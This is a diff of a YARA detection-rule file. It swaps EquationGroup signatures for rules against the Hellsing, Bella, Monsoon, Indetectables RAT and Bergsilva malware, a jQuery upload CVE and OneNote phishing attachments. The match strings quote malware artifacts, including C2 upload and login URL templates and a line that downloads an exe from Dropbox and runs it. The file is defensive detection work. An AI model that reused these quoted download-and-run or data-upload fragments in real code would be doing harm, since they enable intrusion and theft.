 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "60336294ef5fa0221fc6a0e8b05bb279ac0e167024568cd9efa78e678e763704"
+		logic_hash = "232e4dfd8d236da223240d9a4ec3f8bfa635d51d7376ff19dfa5579af31fc47f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "25eec68fc9f0d8d1b5d72c9eae7bee29035918e9dcbeab13e276dec4b2ad2a56"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = "KEysud" fullword ascii
-		$s2 = "XWWWPWS" fullword ascii
+		$a1 = "%s\\system\\%d.txt"
+		$a2 = "_msger"
+		$a3 = "http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
+		$a4 = "http://%s/data/%s.1000001000"
+		$a5 = "/lib/common.asp?action=user_upload&file="
+		$a6 = "%02X-%02X-%02X-%02X-%02X-%02X"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
 }
-rule SIGNATURE_BASE_Equationgroup_Runaschild_Lp : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Irene : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file RunAsChild_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0623c3f-3a49-5cdf-89ea-2b3273fd8324"
-		date = "2017-01-13"
+		description = "detection for Hellsing msger irene installer"
+		author = "Kaspersky Lab"
+		id = "b57d1a10-4e5c-511f-b98c-8ce7d766c227"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1720-L1735"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L119-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77bea554ead64f85f4efdc49f91ea3b24d1759ae9d91718d443938ab862b0191"
+		logic_hash = "e7da04083468dba7045b55181642d7cd57d543fbeda24685ba2ac63799740798"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = "Privilege elevation failed" fullword wide
-		$s2 = "Unable to open parent process" fullword wide
-		$s4 = "Invalid input to lpRunAsChildPPC" fullword wide
+		$a1 = "\\Drivers\\usbmgr.tmp" wide
+		$a2 = "\\Drivers\\usbmgr.sys" wide
+		$a3 = "common_loadDriver CreateFile error!"
+		$a4 = "common_loadDriver StartService error && GetLastError():%d!"
+		$a5 = "irene" wide
+		$a6 = "aPLib v0.43 - the smaller the better"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_6 : FILE
+rule SIGNATURE_BASE_VUL_Jquery_Fileupload_CVE_2018_9206 : CVE_2018_9206
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_dll_x64"
+		description = "Detects JQuery File Upload vulnerability CVE-2018-9206"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99b2fab0-1298-5d48-a78b-eb59942ecfca"
-		date = "2017-01-13"
+		id = "20bac44c-0e5a-5561-9fd8-a71cd2d8590a"
+		date = "2018-10-19"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1737-L1752"
+		reference = "https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_jquery_fileupload_cve_2018_9206.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5a14bd8efe2cf68beec207e5deec28fd5b9d89c506593214eccbceae3cb862a7"
+		logic_hash = "ef7cc13130c60ece346802cb6efec96065f84407fb84b89703628fdf32c0ee53"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "339855618fb3ef53987b8c14a61bd4519b2616e766149e0c21cbd7cbe7a632c9"
+		tags = "CVE-2018-9206"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s3 = "Copyright (C) Microsoft" fullword wide
+		$s1 = "error_reporting(E_ALL | E_STRICT);" fullword ascii
+		$s2 = "require('UploadHandler.php');" fullword ascii
+		$s3 = "$upload_handler = new UploadHandler();" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll_X64 : FILE
+rule SIGNATURE_BASE_OSX_Backdoor_Bella : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_http_flav_dll_x64"
-		author = "Florian Roth (Nextron Systems)"
-		id = "93a3d47d-1dac-5621-8e69-d6d23b7628db"
-		date = "2017-01-13"
+		description = "Bella MacOS/OSX backdoor"
+		author = "John Lambert @JohnLaTwC"
+		id = "d2a994f9-acff-5de4-8f70-453b5d4d7947"
+		date = "2018-02-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1754-L1771"
+		reference = "https://twitter.com/JohnLaTwC/status/911998777182924801"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_osx_backdoor_bella.yar#L2-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b304cb747e609ad5de46624e2d0d005d5f8521e16f0b36cab31535709d7ab72f"
+		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
+		logic_hash = "c2fa72072decd850698fbaaa9c2a6687cdf64e6bac068ff52a97963053db4339"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4e0209b4f5990148f5d6dee47dbc7021bf78a782b85cef4d6c8be22d698b884f"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s3 = ".?AVOpenSocket@@" fullword ascii
-		$s4 = "RHTTP/1.0" fullword wide
-		$s5 = "Copyright (C) Microsoft" fullword wide
+		$h1 = "#!/usr/bin/env"
+		$s0 = "subprocess" fullword ascii
+		$s1 = "import sys" fullword ascii
+		$s2 = "shutil" fullword ascii
+		$p0 = "create_bella_helpers" fullword ascii
+		$p1 = "is_there_SUID_shell" fullword ascii
+		$p2 = "BELLA IS NOW RUNNING" fullword ascii
+		$p3 = "SELECT * FROM bella WHERE id" fullword ascii
+		$subpart1_a = "inject_payloads" fullword ascii
+		$subpart1_b = "check_if_payloads" fullword ascii
+		$subpart1_c = "updateDB" fullword ascii
+		$subpart2_a = "appleIDPhishHelp" fullword ascii
+		$subpart2_b = "appleIDPhish" fullword ascii
+		$subpart2_c = "iTunes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) ) or ( all of them )
+		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and @s0 [ 1 ] < 100 and @s1 [ 1 ] < 100 and @s2 [ 1 ] < 100 and 1 of ( $p* ) or all of ( $subpart1_* ) or all of ( $subpart2_* )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_3 : FILE
+
+rule SIGNATURE_BASE_Monsoon_APT_Malware_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file mssld.dll"
-		author = "Auto Generated"
-		id = "f664ad78-1820-5434-94cc-94f98b32e654"
-		date = "2017-01-13"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1773-L1787"
+		description = "Detects malware from Monsoon APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a543c46d-01fc-5276-a915-183263956455"
+		date = "2017-09-08"
+		modified = "2023-01-06"
+		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_monsoon.yar#L14-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b43280a94f1f5c62185f6b879126bcd258e9875beeb0f7ec1e3569494a60669"
+		logic_hash = "76580f999d445f4baace5287a3038e294f8be3783289d6c7c5b2c0c92c39db86"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "69dcc150468f7707cc8ef618a4cea4643a817171babfba9290395ada9611c63c"
+		hash1 = "c9642f44d33e4c990066ce6fa0b0956ff5ace6534b64160004df31b9b690c9cd"
 
 	strings:
-		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
-		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
-		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
+		$s1 = "cmd.exe /c start " fullword ascii
+		$s2 = "\\Microsoft\\Templates\\" ascii
+		$s3 = "\\Microsoft\\Windows\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a0c824244f1d36ea1dd2759cf7599cd1" or all of them ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Getadmin_Lp : FILE
+rule SIGNATURE_BASE_Monsoon_APT_Malware_2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file GetAdmin_Lp.dll"
+		description = "Detects malware from Monsoon APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3bbe0553-a5a3-5207-a94e-ad978606d9a4"
-		date = "2017-01-13"
+		id = "dbbccf56-7e36-5c3a-b8d9-ee08d077f29f"
+		date = "2017-09-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1789-L1802"
+		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_monsoon.yar#L37-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5bff3858c59b1bb44c5e24ca5f77d8e1e582224cc1caad3955d1adb0efea318a"
+		logic_hash = "20552573102dd981c81ffa6a8c7bbdfafc9bbb7da1fbc12f273bca7d6a0c9d05"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
+		hash1 = "17c3d0fe08e1184c9737144fa065f4530def30d6591e5414a36463609f9aa53a"
+		hash2 = "8e0574ebf3dc640ac82987ab6ee2a02fc3dd5eaf4f6b5275272ba887acd15ac0"
+		hash3 = "bf93ca5f497fc7f38533d37fd4c083523ececc34aa2d3660d81014c0d9091ae3"
 
 	strings:
-		$x1 = "Current user is System -- unable to join administrators group" fullword wide
+		$x1 = "\\Microsoft\\Windows\\coco.exe" ascii
+		$x2 = ":\\System Volume Information\\config" fullword ascii
+		$x3 = " cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d" fullword wide
+		$s1 = "\\Microsoft\\Templates\\msvcrt.dll" ascii
+		$s2 = "%04d/%02d/%02d %02d:%02d:%02d - {%s}" fullword wide
+		$s3 = "wininet.dll    " fullword ascii
+		$s4 = "DMCZ0001.dat" fullword ascii
+		$s5 = "TZ0000001.dat" fullword ascii
+		$s6 = "\\MUT.dat" ascii
+		$s7 = "ouemm/emm!!!!!!!!!!!!!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Modifygroup_Lp : FILE
+rule SIGNATURE_BASE_Indetectables_RAT : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ModifyGroup_Lp.dll"
+		description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
 		author = "Florian Roth (Nextron Systems)"
-		id = "82c9617a-3d78-525f-a507-76c87aad7c59"
-		date = "2017-01-13"
+		id = "f8322822-617c-50cf-8b64-60da3a202ca5"
+		date = "2015-10-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1805-L1819"
+		reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_indetectables_rat.yar#L8-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8fe5102cacd9149a0ed60440c563953d487aa2b28a3b947d821d0cc3f3396a4a"
+		logic_hash = "840a0c92ac731d9e88d0bdccb39598e4ff476e8630ec08f6c4024a31e258ebd0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
+		super_rule = 1
+		hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
+		hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
+		hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
 
 	strings:
-		$s1 = "Modify Privileges failed" fullword wide
-		$s2 = "Given privilege name not found" fullword wide
+		$s1 = "Coded By M3" fullword wide
+		$s2 = "Stub Undetector M3" fullword wide
+		$s3 = "www.webmenegatti.com.br" wide
+		$s4 = "M3n3gatt1" fullword wide
+		$s5 = "TheMisterFUD" fullword wide
+		$s6 = "KillZoneKillZoneKill" fullword ascii
+		$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
+		$s8 = "M3_F_U_D_M3" ascii
+		$s9 = "M3n3gatt1hack3r" fullword wide
+		$s10 = "M3n3gatt1hack3r" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Pwdump_Lp : FILE
+rule SIGNATURE_BASE_Bergsilva_Malware : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file pwdump_Lp.dll"
+		description = "Detects a malware from the same author as the Indetectables RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6f356f13-9ec1-5dd9-91b2-6a3071398e81"
-		date = "2017-01-13"
+		id = "5f35aea6-1d80-594a-a6e0-8e8bb30bc358"
+		date = "2015-10-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1821-L1834"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_indetectables_rat.yar#L35-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7381ffd9b2b720fa99d52bc5805fea942e5a966bf3fd611f1a80a875edd06dad"
+		logic_hash = "03b823040a057ffbef9bcb3094a672fd75e141f3e82c77548adbe1c465d329fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
+		super_rule = 1
+		hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
+		hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
 
 	strings:
-		$x1 = "PWDUMP - - ERROR - -" wide
+		$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
+		$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
+		$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
+		$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
+		$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
+		$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
+		$s5 = "https://dl.dropbox.com/u/105015858" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Eventlogedit_Implant : FILE
+rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file EventLogEdit_Implant.dll"
+		description = "Detects suspicious OneNote attachment that embeds suspicious payload, e.g. an executable (FPs possible if the PE is attached separately)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40239dd0-4159-5c10-96b3-4f1e28c92d97"
-		date = "2017-01-13"
+		id = "492b74c2-3b81-5dff-9244-8528565338c6"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1836-L1851"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L2-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d391eaed77150ab2a26dfed60ebd82aa2c6802b6b604791fb78d08db7fe5ec9"
-		score = 75
+		logic_hash = "c7c5fc86f1dbe54da2d3ff8f039c5e53c3d1f67c9271cb467b2318310f744f93"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0bb750195fbd93d174c2a8e20bcbcae4efefc881f7961fdca8fa6ebd68ac1edf"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\%ls" fullword wide
-		$s2 = "Ntdll.dll" fullword ascii
-		$s3 = "hZwOpenProcess" fullword ascii
+		$ge1 = "5xbjvWUmEUWkxI1NC3qer"
+		$ge2 = "cW471lJhFFpMSNTQt6nq"
+		$ge3 = "nFuO9ZSYRRaTEjU0Lep6s"
+		$sp1 = "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZG"
+		$sp2 = "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
+		$sp3 = "UaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZ"
+		$sp4 = "VGhpcyBwcm9ncmFtIG11c3QgYmUgcnVuIHVuZGVy"
+		$sp5 = "RoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlc"
+		$sp6 = "UaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZX"
+		$se1 = "QGVjaG8gb2Zm"
+		$se2 = "BlY2hvIG9mZ"
+		$se3 = "AZWNobyBvZm"
+		$se4 = "PEhUQTpBUFBMSUNBVElPTi"
+		$se5 = "xIVEE6QVBQTElDQVRJT04g"
+		$se6 = "8SFRBOkFQUExJQ0FUSU9OI"
+		$se7 = "TAAAAAEUAg"
+		$se8 = "wAAAABFAIA"
+		$se9 = "MAAAAARQCA"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		filesize < 5MB and 1 of ( $ge* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Equationgroup_Portmap_Lp : FILE
+rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PortMap_Lp.dll"
+		description = "Detects suspicious OneNote attachment that has a file name often used in phishing attacks"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1851a17-9858-5c93-9993-2da0559e5d2e"
-		date = "2017-01-13"
+		id = "f8c58c73-2404-5ce6-8e8f-99b0dad84ad0"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1853-L1868"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L41-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9666e64b40dc01c5b3756b1334519730765f7075ba9a124a79f5b7ea4bc91e03"
-		score = 75
+		logic_hash = "eb6f992ce186022f04613af3bf4df629b00d85eac151f8bbd4b8ef96e6892eab"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
 
 	strings:
-		$s1 = "Privilege elevation failed" fullword wide
-		$s2 = "Portmap ended due to max number of ports" fullword wide
-		$s3 = "Invalid parameters received for portmap" fullword wide
+		$hc1 = { 2E 6F 6E 65 22 0D 0A 0D 0A 35 46 4A 63 65 }
+		$x01 = " attachment; filename=\"Invoice" nocase
+		$x02 = " attachment; filename=\"ORDER" nocase
+		$x03 = " attachment; filename=\"PURCHASE" nocase
+		$x04 = " attachment; filename=\"SHIP" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+		filesize < 5MB and $hc1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Equationgroup_Processoptions_Lp : FILE
+rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ProcessOptions_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5ccb9751-fbcc-538c-8d55-dfc495067ce5"
-		date = "2017-01-13"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1870-L1883"
+		description = "Detects suspicious embedded file types in OneNote files"
+		author = "Florian Roth"
+		id = "b8ea8c7b-052f-5a97-9577-99903462ea84"
+		date = "2023-01-27"
+		modified = "2023-02-27"
+		reference = "https://blog.didierstevens.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L63-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc9cd566f57d28ccea6d53d2eba71187f01cdf6e140771cace33349f6439461d"
-		score = 75
+		logic_hash = "d91ca297ea96f80534085f174d335ffe961c569534f043c5c2ae8d6a9f7ac083"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
 
 	strings:
-		$s1 = "Invalid parameter received by implant" fullword wide
+		$x1 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? 4d 5a }
+		$x2 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 40 65 63 68 6f }
+		$x3 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 40 45 43 48 4f }
+		$x4 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 4F 6E 20 45 }
+		$x5 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [0-4] 6F 6E 20 65 }
+		$x6 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? 4c 00 00 00 }
+		$x7 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? 49 54 53 46 }
+		$x8 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [6-200] 3C 68 74 61 3A }
+		$x9 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [6-200] 3C 48 54 41 3A }
+		$x10 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
+              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+              ?? ?? ?? ?? [6-200] 3C 6A 6F 62 20 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		filesize < 10MB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Passfreely_Lp : FILE
+rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PassFreely_Lp.dll"
+		description = "Detects suspicious embedded file types in OneNote files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fb99194-f0df-54aa-9f20-7f8458155e62"
-		date = "2017-01-13"
+		id = "0664d202-ab4c-57b6-91ee-ea21ac08909e"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1885-L1900"
+		reference = "https://blog.didierstevens.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L108-L125"
